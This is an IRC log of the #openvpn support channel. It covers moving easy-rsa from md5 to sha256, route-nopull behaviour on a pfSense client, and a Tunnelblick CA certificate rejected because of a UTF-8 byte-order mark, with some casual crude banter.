10:08 <@krzee> personally i aim for a CA that has no network connection at all
10:08 <@krzee> the ca.key is the cornerstone of pki
10:08 <@krzee> !pki
10:08 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Heres a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that each other were signed by the right ca.key. Optionally, the client also checks that the server cert was
10:08 <@vpnHelper> signed specially as a server (see !servercert)
10:09 <+pekster> You can generate the keypair on the client-side, but the certificate needs to be signed by the same CA you used to create the PKI. If you're using easy-rsa, you must generate the keypairs where you sign them as it has no facility to sign them (at least not via the included scripts)
10:09 < rob0> The way it should work: A client generates its own key and CSR. Send the CSR to the CA. The CA signs the CSR and returns the certificate.
10:09 <@krzee> pekster, you sure? i believe it at least *used to* have the ability to generate keys and sign them separately
10:09 <@krzee> just not as advertised
10:10 <+pekster> If by "not as advertised" you mean "you must manually call openssl" then yes :)
10:10 <@krzee> nah
10:10 <+pekster> rob0: I agree 100%
10:10 <@krzee> i mean not spelt out as clearly in the howto, but its there
10:10 <+pekster> At least not in my Windows install. I don't have easy-rsa cruft installed on my 2 headless systems
10:10 <@krzee> ahh i havnt looked at the windows bats in a long time, and barely looked at them back then
10:11 <@krzee> i meant the nix .sh scripts
10:11 <+pekster> I didn't think they had it either, but maybe I'm wrong
10:11 < c3vin> ok, thanks rob0 that helps
10:11 <@krzee> you're basically neighbors with the easy-rsa maintainer :D
10:13 <@krzee> (twin cities)
10:13 <+pekster> It should be patched to support >sha1. Maybe I'll get motivated to do so in Feb
10:13 <@krzee> what should be patched to support > sha1?
10:13 <@krzee> --tls-auth ?
10:13 <+pekster> easy-rsa
10:13 -!- AsadH is now known as zz_AsadH
10:14 <@krzee> easy-rsa uses sha1 where?
10:14 <@krzee> !easy-rsa
10:14 <@vpnHelper> "easy-rsa" is (#1) easy-rsa is a certificate generation utility. or (#2) Download here: https://github.com/OpenVPN/easy-rsa/downloads or (#3) Download easy-rsa from git hub at https://github.com/OpenVPN/easy-rsa
10:15 <+pekster> Oh, I take it back; 2.3.0 (again, at least on Windows) specifies md5 :P
10:16 <+pekster> Again, not a real "problem" except for use in places that (should) have IT folks who know enough to vet the security of "important" systems
10:17 <@krzee> …even worse, whats it using hashes for?
10:17 <@krzee> just for file integrity?
10:19 -!- raidz_away is now known as raidz
10:19 <+pekster> You hash values and sign the hash, so the security relies on the hash to be resistant against collisions. There have been some fun papers showing how when you can (potentially) control some of the output (eg: by sending specially-crafted CSRs) to a CA, you can potentially take advantage of such weaknesses in the hash alg
10:19 <+pekster> There's really no reason not to use at least sha256 these days
10:19 <@krzee> ouch
10:19 <@krzee> i strongly agree in that case
10:21 <+pekster> It won't really matter for some random joe playing around with ovpn at home, and one hopes that "security professionals" know better. Then again, I've seen a lot that need a few clue-by-fours to hit them in the head first :\
10:21 <@krzee> ya man, your avg gpu these days can rip md5/sha1 right up
10:22 -!- nonotza [~nonotza@rrcs-50-74-239-162.nyc.biz.rr.com] has joined #openvpn
10:23 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
10:23 <+pekster> Little different, but there was a really cool presentation (I forget what security conference this was, maybe defcon) where researchers showed that a combination of predictable serial numbers and md5 hashing allowed them to purchase a targeted cert and modify it without error in a browser
10:24 <+pekster> Solution: use better hashes and random serial numbers :)
10:24 <@krzee> ecrist, ping ^
10:24 <+pekster> openssl can't really help with the serials, since it's a "poor man's" PKI to begin with
10:25 <@krzee> sure, but a nice sha256, like you said, would be a nice start
10:25 <@krzee> wont be colliding that any time too soon
10:26 <@krzee> i wonder if the hardened polarssl openvpn-nl can use those certs
10:26 <@krzee> i believe it doesnt even know what md5 / sha1 are
10:26 <@krzee> (polarssl)
10:27 * ecrist looks
10:29 -!- Devastator- [~devas@177.18.197.23] has quit [Changing host]
10:29 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn
10:29 <+pekster> ecrist: Here's a patch against whatever the easy-rsa stuff installed by default in Windows under 2.3.0 is: http://pekster.sdf.org/misc/easy-rsa-sha256.patch
10:30 <+pekster> I'd presume it's the same cnf file for *nix too
10:30 <+pekster> (that bit about doing it under [req] is also very required for the client (non-CA) certs too)
10:31 -!- jthunder [~jthunder@184.151.222.164] has joined #openvpn
10:31 <+pekster> Upping the default key size to 2048 is probably also wise if you're making security-conscious upgrades ;)
10:32 <+pekster> Reference: talk ID 5275 from http://mirror.fem-net.de/CCC/29C3/mp4-h264-HQ/ (really good talk if you're into RSA factorization attacks, btw. They're funny speakers to boot)
10:32 <@vpnHelper> Title: Index of /CCC/29C3/mp4-h264-HQ/ (at mirror.fem-net.de)
10:32 <@ecrist> pekster: is that against git?
10:32 <@krzee> damn i forgot to bookmark that page, thanks =]
10:32 <+pekster> No, whatever was installed locally. I'll get you a proper source patch if you'd like
10:33 <@ecrist> pretty please
10:36 <+pekster> ecrist: What's with all the various versions of openssl .cnf files in the master? Does the change need to go in all of them?
10:37 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
10:37 <+pekster> Yea, I guess so, due to that whichopensslcnf deal
10:37 <+pekster> k
10:38 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 264 seconds]
10:44 <@ecrist> pekster: I took over recently, so I have not a clue
10:44 <@ecrist> pekster: pm?
10:44 <+pekster> Sure
10:46 <+pekster> ecrist: I split the patches out against current git master, one for the sha256 change, and another for the keysize -> 2048 bit. http://pekster.sdf.org/misc/ovpn-patches/
10:46 <@vpnHelper> Title: Index of /misc/ovpn-patches (at pekster.sdf.org)
10:49 -!- jthunder_ [~jthunder@184.151.222.164] has joined #openvpn
10:51 -!- jthunder [~jthunder@184.151.222.164] has quit [Ping timeout: 272 seconds]
10:51 -!- jthunder_ is now known as jthunder
10:55 <+pekster> krzee: Re: PolarSSL, the features list supports all official SHA2 variants, so that change shouldn't break any embedded system that's built with a non-ancient version
10:57 <+pekster> And if it is that ancient, people can run my patch in reverse on their local copy :P
10:59 -!- igor_ [~igor@pd907e599.dip0.t-ipconnect.de] has quit [Quit: leaving]
11:01 -!- APTX [~APTX@unaffiliated/aptx] has quit [Quit: Farewell]
11:01 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn
11:04 -!- zz_AsadH is now known as AsadH
11:06 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 244 seconds]
11:07 -!- jthunder [~jthunder@184.151.222.164] has quit [Ping timeout: 272 seconds]
11:13 <+pekster> ecrist: Oh, hold off on that patch. 2 things I had to dig in the scripts to see, at least under the 2.0 Linux stuff. There's some hard-coding going on of the md selection in the command, and a 2nd cnf section for the server. So, more changes needed :(
11:18 -!- troker [~troker@174.142.225.243] has joined #openvpn
11:20 < troker> Hey all, is there a command that I can run on my OpenVPN client that negates all push options? Im trying to set up my router as a client but ALL my traffic is getting routed through the VPN, the push options are here: PUSH_REPLY,topology subnet,route-gateway 10.200.4.1,dhcp-option DNS 208.67.222.222,dhcp-option DNS 208.67.220.220,ping 10,ping-restart 90,redirect-gateway def1,ifconfig 10.200.5.15 255.255.252.0'
11:20 < troker> I think the redirect-gateway def1 is the culprit
11:21 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
11:22 <+pekster> troker: Perhaps you want --route-nopull ?
11:22 < troker> pekster: Already have that in my config
11:23 < troker> And I *used* to get routes to 0.0.0.0 (kinda redundant) but I'm not getting them anymore so the --route-nopull I think is working
11:23 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
11:23 < troker> I see this line "openvpn[36893]: SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)"
11:23 < troker> Is that me requesting a push? Can I just not request the push somehow
11:24 <+pekster> You need that to get your IP, unless you know what that is going to be ahead-of-time
11:25 < troker> Mhm, ok - It looks like that my original idea may be wrong though, further inspection turns up: openvpn[36893]: Options error: option 'redirect-gateway' cannot be used in this context. So I guess the redirect-gateway isn't the culprit
11:25 <+pekster> At 'verb 4' you should see some message in the log about inhibiting the action of each of the route-related pushes
11:25 < c3vin> so when I browse to openvpn server's URL, windows downloads client and certs automatically
11:26 < c3vin> is there a way I can do the same in centos?
11:26 <+pekster> c3vin: That's not a feature OpenVPN provides. Either the owner did some clever scripting of download options, or you're using the commercial "Access Server" product which is not part of the open-source OpenVPN program we support here
11:27 <+pekster> !as
11:27 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
11:27 -!- raidz [~raidz@openvpn/corp/admin/andrew] has left #openvpn []
11:27 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn
11:27 -!- mode/#openvpn [+o raidz] by ChanServ
11:27 < c3vin> is client connect part of access server?
11:28 <+pekster> Sounds like it, yes. The open-source version does not have a "client" in the name; it's the same installation for both server and client, you just configure them to take on whatever role you need
11:28 <+pekster> !download
11:28 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only
11:28 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs
11:29 -!- dazo_afk is now known as dazo
11:32 < troker> pekster: am I missing something here? maybe Im implementing it wrong: http://pastebin.com/raw.php?i=ekA88nMT
11:33 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 276 seconds]
11:34 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
11:36 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn
11:37 -!- p3rror [~mezgani@2001:0:53aa:64c:cb0:1eff:d606:ec34] has joined #openvpn
11:38 <+pekster> troker: Besides the fact that your route command is apparently failing 3 lines from the bottom, that looks normal to me. The redirect-gateway isn't processed since you're not pulling routes
11:39 < troker> pekster: mum, ok thanks for the second set of eyes & the ideas. I *think* that error is because I keep bringing up and tearing down the interface, so the route is already there… Any other thoughts as to where I might look?
11:40 <+pekster> What's the problem? Nowhere in that setup is it messing with your gateway
11:40 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
11:42 < troker> So when the connection comes up (the logs you're seeing) everyone is ok. Next step is to add that connection to an interface in pfsense to make it usable and routable by the nanoBSD OS and the router's clients. However as SOON as I do that (create the interface) *all* traffic gets pushed up the client VPN. Im guessing its a global route too because it totally breaks the (functioning and entirely separate) VPN that I use to get into my home network.
11:42 < troker> I was thinking that maybe it had a route passed to it (like 0.0.0.0) and as soon as I created an interface it was able to act on that route
11:43 < troker> but it seems like the issue might be elsewhere
11:43 <+pekster> You need to check your upscript for errors then
11:43 <+pekster> Anything that's happening to your routing is happening there, not part of openvpn's connection process or parsing of options it gets from the VPN peer
11:43 -!- p3rror [~mezgani@2001:0:53aa:64c:cb0:1eff:d606:ec34] has quit [Remote host closed the connection]
11:44 <+pekster> ie: up_script = '/usr/local/sbin/ovpn-linkup'
11:46 < troker> would bypassing the up_script have any effect?
11:47 <+pekster> The effect would be that it won't get run when the VPN connection is established
11:47 <+pekster> What this means for you I have no idea since that script can do anything it's told
11:51 < troker> pekster: Thoughts on this? The redirect-gateway directive fails because it isn't bound to any interface, but when I do bind it to one the directive takes over?
11:52 <+pekster> Define "takes over" ? If you don't use --route-nopull, you're going to get the exact behaviour described in the manpage under --redirect-gateway
11:54 < troker> Ok, so in here (http://pastebin.com/raw.php?i=ekA88nMT) at the very top I have my flags that Im running openvpn with - the route-nopull should… not pull routes (correct?) -- so why then at the bottom of my logs am I seeing references to redirect-gateway? Wouldn't the route-nopull block that right off the bat? --- Jan 29 12:26:29 pfsense openvpn[23808]: Options error: option 'redirect-gateway' cannot be used in this context
11:55 <+pekster> It is blocking it. That's what that message says. It tells you "The server sent me this option, but in the context you've requested, I'm not going to process it."
11:56 < troker> Ahhh ok, thank you, that makes things much clearer. I was under the impression that it was referring to the fact that it had no interface to bind to so I couldn't redirect traffic through it.
11:58 -!- AsadH is now known as zz_AsadH
12:04 -!- b1rkh0ff [~b1rkh0ff@31.176.156.222] has quit [Ping timeout: 240 seconds]
12:05 -!- b1rkh0ff [~b1rkh0ff@31.176.147.137] has joined #openvpn
12:19 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has quit [Ping timeout: 248 seconds]
12:20 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has joined #openvpn
12:21 < cirdan> hey any chance I can get some help with tunnelblick in here? I got a working config other places not working on the latest beta. It tells me it can't find my ca.crt even if I give it a full path
12:24 <@krzee> i just tell it that i have configs, then i dump everything into the folder it gives me and rename it like it says
12:25 < cirdan> I did that and it won't work
12:25 < cirdan> sad that i got openvpn working on my iphone before my mac
12:25 <@krzee> did the config simply say "ca ca.crt"
12:25 <@krzee> or did it have full path?
12:25 < cirdan> either. neither work
12:26 <@krzee> sad? i think thats awesome, the ios client is very new
12:26 < cirdan> sad that it's not working on os x
12:26 <@krzee> need the latest beta?
12:26 < cirdan> got it
12:26 <@krzee> but do you need it?
12:26 <@krzee> beta generally means less tested
12:27 < cirdan> i'm on 10.8 iirc it was recommended
12:27 <@krzee> try submitting a ticket to them
12:27 < cirdan> 2013-01-29 13:26:56 us=171918 Cannot load CA certificate file /Library/Application Support/Tunnelblick/Users/chris/lorien.tblk/Contents/Resources/ca.pem path (null) (SSL_CTX_load_verify_locations) (OpenSSL)
12:27 <@krzee> i dont run 10.8 or the latest beta
12:27 <@krzee> well, do you see the crt there?
12:27 < cirdan> that was with the full path quoted
12:28 < cirdan> err
12:28 < cirdan> wait a sec
12:29 -!- troker [~troker@174.142.225.243] has left #openvpn []
12:29 < cirdan> yup it exists there
12:30 <@krzee> does the md5 match?
12:31 <+pekster> That's a somewhat strange path, but okay. When I used Tunnelblick it more or less intended you to keep ca certs like that either under /Users somewhere, or directly in the Tunnelblick.app package when you shipped pre-packaged cert files
12:31 < cirdan> yes they are the same
12:31 <@krzee> you have a choice, keep it for the user only or the entire system
12:31 < cirdan> pekster: now it creates a "shadow copy" it tells me
12:31 <+pekster> That's likely why it can't find it, since you need to call the program as root to get the right perms
12:32 <+pekster> Vista did the same thing before they "fixed" it in SP1. Try checking for that file as the root user in a terminal
12:32 < cirdan> it asks for root if i modify in my home config
12:32 < cirdan> it exits and you need root to read the dir
12:32 <+pekster> It may not exist if apple's doing some goofy copy in your personal user view or something
12:33 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has joined #openvpn
12:33 <@krzee> try importing it for the user instead?
12:33 < cirdan> It is a user config
12:34 <@krzee> ok then try the other
12:34 <+pekster> But according to that path, it's stored under the "Application Support" in the system library. Maybe things are symlinked or hardlinked in screwy ways, but then you have a lot more stuff messed up that I don't even want to touch :P
12:34 <@krzee> its a tunnelblick problem, we dont know the solution, but you might stumble onto a workaround (or you could just go file a ticket with them)
12:34 < cirdan> yeah
12:34 < cirdan> gonna try the other beta they have posted
12:35 <+pekster> I've generally been impressed with how Tunnelblick handled itself, but I've been out of the loop since $oldjob when I was maintaining pre-packaged "install and connect" type releases
12:35 <+pekster> In that regard, they did better than any other platform I've seen with that kind of support
12:36 <@krzee> i used to dislike tunnelblick, but in the last year or 2 i gave it another try and have had nothing but good experience with it since
12:36 <+pekster> Drag to Applications folder, click OK on the permissions dialog, enter your password, and you're done
12:36 <@krzee> also better interface for managing multiple tunnels (imo)
12:36 < cirdan> you don't even need to drag it anymore. if you open it from the image it'll ask to copy itself and restart itself
12:37 <@krzee> i also like that it directly imports configs instead of trying to help you generate one
12:37 <+pekster> Well, the magic I did was in pre-packaging the configs inside the .app folder
12:37 <+pekster> They have a specific method to declare the options you need, the config file, and all the supporting certs/keys/whatever
12:37 <+pekster> It's super-easy, if you follow their guidelines
12:38 <+pekster> As soon as it's installed, the user has immediate access to whatever you've configured it to support (in my case, a VPN to $oldjob's network)
12:41 <+pekster> This: https://code.google.com/p/tunnelblick/wiki/cCusDeployed#How_to_Make_a_Deployed_Version
12:41 <@vpnHelper> Title: cCusDeployed - tunnelblick - Deploying Tunnelblick - OpenVPN GUI for Mac OS X - Google Project Hosting (at code.google.com)
12:42 < cirdan> yeah other beta wont work
12:43 <+pekster> cirdan: Sounds like a problem with "views" on the filesystem depending on what user is actually invoking openvpn, or possibly a chroot issue if your config or Tunnelblick now tries to add that automatically
12:45 <+pekster> If the file is there and you can verify this by running the config passed to openvpn directly on a command prompt as root, then you should file the bug downstream with Tunnelblick. If not, you need to find your file first ;)
12:55 <@krzee> watching http://mirror.fem-net.de/CCC/29C3/mp4-h264-HQ/29c3-5275-en-facthacks_h264.mp4 and just waiting for a joke about "minding your p's and q's"
12:56 < cirdan> yeah doesn't work on the command line either, which makes sense
12:56 < cirdan> but root can read the files fine
12:56 < cirdan> so can I atm
12:58 <+pekster> krzee: Oh no, the jokes are much more blunt than that. Just wait until you hear about the secure cloud storage solutions they reference near the end
12:59 <+pekster> cirdan: Calling openvpn directly from the prompt also failed? Citing the same error to the file, that you can 'ls -l "$file"' and 'less "$file"' on?
13:00 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 264 seconds]
13:00 -!- krzie [nobody@hemp.ircpimps.org] has joined #openvpn
13:00 -!- krzie [nobody@hemp.ircpimps.org] has quit [Changing host]
13:00 -!- krzie [nobody@openvpn/community/support/krzee] has joined #openvpn
13:00 -!- mode/#openvpn [+o krzie] by ChanServ
13:01 <+pekster> krzie: Bad time to ping out. http://fpaste.org/wNw7/raw/
13:01 <@krzie> nice i wasnt sure you caught what i said or not
13:02 < cirdan> wtf. so... my ca cert was a utf8 file and it was being rejected?!?
13:03 < EugeneKay> BOM enabled?
13:03 < cirdan> i guess so
13:03 < EugeneKay> No surprise there.
13:03 <@krzie> BOM?
13:03 < cirdan> bill of materials :-)
13:04 < cirdan> why should it matter if there is a bom?
13:04 < EugeneKay> Byte Order Mark, aka 
13:04 <@krzie> beer or marijuana :D
13:04 <@krzie> aka, what to bring to my parties
13:04 < EugeneKay> Because /nothing/ knows to look for & strip BOMs
13:05 < EugeneKay> krzie - "or"? :'-(
13:05 <@krzie> hey im not TOO demanding
13:05 < cirdan> ok one last question, is there any way, while using a tun device, to make it act like tap, aka share the same subnet with my home network?
13:06 < EugeneKay> You can add a second IP to your eth interface and do 1-to-1 NATing
13:06 < EugeneKay> But really, just set it up to route properly.
13:06 < cirdan> I hate it routing properly, was just wondering
13:07 < EugeneKay> Then you don't understand networking :-p
13:07 <@krzie> theres also a special feature built into openvpn for this
13:07 < cirdan> just a minor annoyance
13:07 <@krzie> i have no idea why, but there is
13:07 < EugeneKay> There is? o.O
13:07 <@krzie> i strongly recommend not using it
13:07 <@krzie> !nathack
13:07 <@vpnHelper> "nathack" is see https://community.openvpn.net/openvpn/wiki/NatHack for info on how to solve the problem when you need !route_outside_ovpn but cant add a route to the gateway or the lan machines
13:07 < EugeneKay> Oh, that.
13:07 <@krzie> hmm where is it
13:07 <@ecrist> pekster: incoming from freenode staff
13:07 <@krzie> theres an actual --option
13:08 <+pekster> k
13:08 <@krzie> !factoids
13:08 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php
13:08 < cirdan> that's not it. I just prefer my devices having the same ip lan or vpn, no worries
13:08 < EugeneKay> Set up DNS for them then
13:08 < EugeneKay> No more worrying about IPs
13:08 <+pekster> Maning your own fake tld too ;)
13:09 < cirdan> --topology you mean?
13:09 < EugeneKay> Nonsense, you can run it in public DNS
13:09 <@krzie> !samesubnet
13:09 <@vpnHelper> "samesubnet" is (#1) clients can not connect to a server pushing its lan if on the same subnet. you can only reach your subnet on layer2 or through your gateway, when you create a route for it you will try to reach your gateway over the vpn which dies because you cant reach your gateway or (#2) you can use --client-nat if on 2.3 to work around changing the subnet, but you should still just change the
13:09 <+pekster> Well, I keep rfc1918 out of my public zones :P
13:09 <@vpnHelper> subnet
13:09 <@krzie> EugeneKay, that ^
13:09 < EugeneKay> Oh, 2.3
13:10 <@krzie> yep, not sure why they built the nathack into openvpn, but they did
13:10 < EugeneKay> Sadists.
13:12 <+pekster> I find it ironic that NAT-friendly features are added at a time when we want to encourage IPv6 usage globally :P (not just openvpn, mind you.)
13:12 * krzie throws holy water at pekster's ipv6
13:12 -!- pekster [~rewt@openvpn/user/pekster] has quit [Changing host]
13:12 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn
13:12 -!- ServerMode/#openvpn [+v pekster] by zelazny.freenode.net
13:12 -!- krzie is now known as krzee
13:13 -!- mode/#openvpn [+o pekster] by ChanServ
13:14 <@krzee> o/
13:15 < cirdan> oh EugeneKay, the reason i'm confused about the BOM issue is that there is still the --BEGIN-- and end lines...
13:15 < cirdan> ah well
13:15 * cirdan goes and changes the default on bbedit...
13:20 < EugeneKay> Standards are standards
13:20 < EugeneKay> And BOM is a bad one :-p
13:22 < cirdan> well it works now, woot
13:25 < rob0> Wow, that holy water is powerful stuff!
13:26 < cirdan> it wasn't water...
13:33 <@krzee> lol
13:36 < fys> god my last job warped my perception of dubstep
13:36 < fys> i can't hear skrillex without thinking of a strip club
13:37 * krzee puts a $1 in fys' bra
13:37 < fys> haha
13:37 < fys> ;)
13:40 <@krzee> pekster, lol this video is getting funny
13:47 <@pekster> They're pretty smart folks, and don't mind having fun while talking about the potentially dry topic of RSA math
13:51 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 255 seconds]
13:53 < fys> ugh
13:53 < fys> I'm in hell.
13:53 <@krzee> listen to dubstep
13:53 <@krzee> it'll make you think of boobies
13:53 < fys> I'm stuck with 4 servers in the 192.168.xxx.xxx range.
13:53 < fys> :|
13:54 < fys> One of which is 192.168.1.0/24
13:54 < fys> and I can't change it.
13:54 < fys> When my developer is on the road, he's fucked half the time.
13:55 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
13:57 < rob0> stuck?
13:58 < fys> Yeah.
13:58 < fys> It's on a hosted VMware system I don't have console access to
13:58 <@pekster> fys: My solution to that (overlapping rfc1918 networks) is to fire up a tiny VM that serves my laptop a unique range and let the upstream device deal with NAT/upstreamDNS, etc. No more overlap, and functional DNS by way of NAT and dnsmasq
13:58 < fys> behind a shitty fortigate appliance.
13:58 <@pekster> Of course, that assumes you have full control over the remote floating end, and have access to a bootable distro as a VM :\
13:58 < rob0> My solution is to do proper network design from the beginning ;)
13:59 < fys> I didn't design it.
13:59 < fys> Ass.
13:59 < rob0> or, go back and fix it later
13:59 < fys> Yeah, again.
13:59 < fys> Can't.
13:59 < rob0> sucks to be you
13:59 < fys> Yes it does.
13:59 < fys> At least from this problem.
14:00 < fys> Whoever designed this network was a fucking idiot.
14:00 < rob0> Many network designers are. Certainly not unusual.
14:00 <@krzee> ive had to tell a few people "the last guy did not think this far ahead, i can duct tape it together and wish the next guy good luck, or i can go back and spend more time doing it over again clean and correctly, the choice is yours"
14:00 <@krzee> most people elect to have it done correctly
14:01 < fys> krzee: The thing that infuriates me the most is that the Fortigate appliance has VPN shit built-in so they should have thought about VPN and IP ranges when picking shit.
14:01 < fys> :|
14:01 < fys> "HMMM THIS NETWORK MIGHT NEED VPN... 192.168.1.0/24 IT IS!"
14:02 < fys> Fucking amateurs.
14:02 <@krzee> lol
14:02 < fys> I'm -far- from a network guy myself.
14:02 < fys> but even I know not to do that.
14:02 < fys> heh
14:06 -!- pekster [~rewt@openvpn/community/support/pekster] has quit [Quit: Disconnecting to play with RA/PD on the ISP link]
14:12 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Wychodzi]
14:16 < EugeneKay> Boobies?
14:16 * EugeneKay perks up
14:17 -!- jthunder [~jthunder@70.28.245.121] has joined #openvpn
14:23 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
14:28 <@novaflash> boobs?
14:28 <@novaflash> what?
14:29 <@novaflash> anyone know why this error would popup with openvpn 2.3.0 on win 2008 r2 x64 on the TAP driver? http://fiber.xs4all.nl/TAP.png
14:31 <@krzee> #10?
14:31 -!- rocco1 [~rocco@2001:4dd0:fd53:101:1d09:eea4:2a2:3f7] has joined #openvpn
14:31 <@novaflash> *shrugs* i guess the guy wanted a few tap adapters
14:31 < rocco1> !clientlan
14:31 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for
14:31 <@vpnHelper> a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
14:32 < rocco1> !route_outside_openvpn
14:32 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png
14:33 <@krzee> novaflash, ild prolly use the bat to remove all and start over
14:34 <@krzee> i doubt he actually has 10, likely has fubar'ed things trying to make 1 work
14:34 <@novaflash> does 2.3.0 even HAVE the bat these days? i thought they created a separate installer for tap now?
14:34 <@novaflash> but yeah you're probably right
14:34 <@novaflash> i just threw the message out here hoping someone might go oh yeah, that's a known thing
14:34 <@krzee> sucks pekster left, he pulled them out of the installer
14:34 <@novaflash> but i guess not
14:34 <@novaflash> so you're saying
14:35 <@novaflash> he pulled out?
14:35 <@krzee> the bats you are looking for are somewhere
14:35 <@krzee> i dunno more than that
14:35 <@novaflash> haha
14:35 <@krzee> sorry, but hopefully that helps ya
14:35 <@novaflash> if they're there, i can find them
14:35 <@novaflash> don't worry mate
14:35 <@novaflash> it's not my server that's got the problem
14:36 <@novaflash> i was just curious about the error
14:36 <@novaflash> it kind of looks to me like he used an old installer first
14:36 <@novaflash> then ran the new installer
14:36 <@novaflash> maybe the old driver is still in there
14:39 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 276 seconds]
14:41 -!- genghi [~Adium@p50899BDD.dip.t-dialin.net] has quit [Quit: Leaving.]
14:48 -!- jthunder [~jthunder@70.28.245.121] has quit [Ping timeout: 272 seconds]
14:51 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 272 seconds]
14:54 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn
14:57 < pekster> No IPv6 for me, still :(
15:00 < c3vin> I think access server is fucking up my life right now
15:00 < c3vin> can't get openvpn client on centos to connect
15:00 < EugeneKay> !as
15:00 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
15:00 < c3vin> oh ty
15:01 -!- jthunder [~jthunder@70.28.245.121] has joined #openvpn
15:01 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
15:05 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
15:07 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
15:11 -!- KaiForce [~chatzilla@adsl-70-228-88-232.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0.1/20130116073211]]
15:16 -!- syoma [~syoma@186.34.232.222] has joined #openvpn
15:17 < syoma> Hello
15:17 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
15:18 < syoma> guys, I've the following problem:
15:18 < syoma> "This computer's apparent public IP address was not different after connecting to fw1-TCP-1196-fernando.ormeno. It is still 190.44.118.93.
15:18 < syoma> This may mean that your VPN is not configured correctly."
15:18 < syoma> my config is OK
15:19 < syoma> I use tunnelblick client... somebody can help me please
15:19 < pekster> !goal
15:19 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
15:20 < syoma> pekster: hello man
15:22 -!- bjh4 [~bjh4@12.239.198.1] has joined #openvpn
15:22 -!- bjh4 [~bjh4@12.239.198.1] has quit [Remote host closed the connection]
15:23 -!- brute11k1 [~brute11k@89.249.231.124] has joined #openvpn
15:24 -!- PryMar56 [~prymar@cpe-98-149-139-90.socal.res.rr.com] has joined #openvpn
15:24 -!- brute11k [~brute11k@89.249.231.124] has quit [Ping timeout: 246 seconds]
15:27 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 244 seconds]
15:30 -!- syoma [~syoma@186.34.232.222] has quit [Quit: leaving]
15:32 -!- Saviq_ [~Saviq@194.168.195.98] has joined #openvpn
15:35 -!- Saviq_ [~Saviq@194.168.195.98] has quit [Client Quit]
15:41 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
15:41 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Read error: Connection reset by peer]
15:44 -!- jthunder_ [~jthunder@70.28.245.121] has joined #openvpn
15:45 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn
15:45 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host]
15:45 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
15:47 -!- jthunder [~jthunder@70.28.245.121] has quit [Ping timeout: 272 seconds]
15:47 -!- jthunder_ is now known as jthunder
15:54 -!- nonotza [~nonotza@rrcs-50-74-239-162.nyc.biz.rr.com] has quit [Quit: nonotza]
15:54 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 272 seconds]
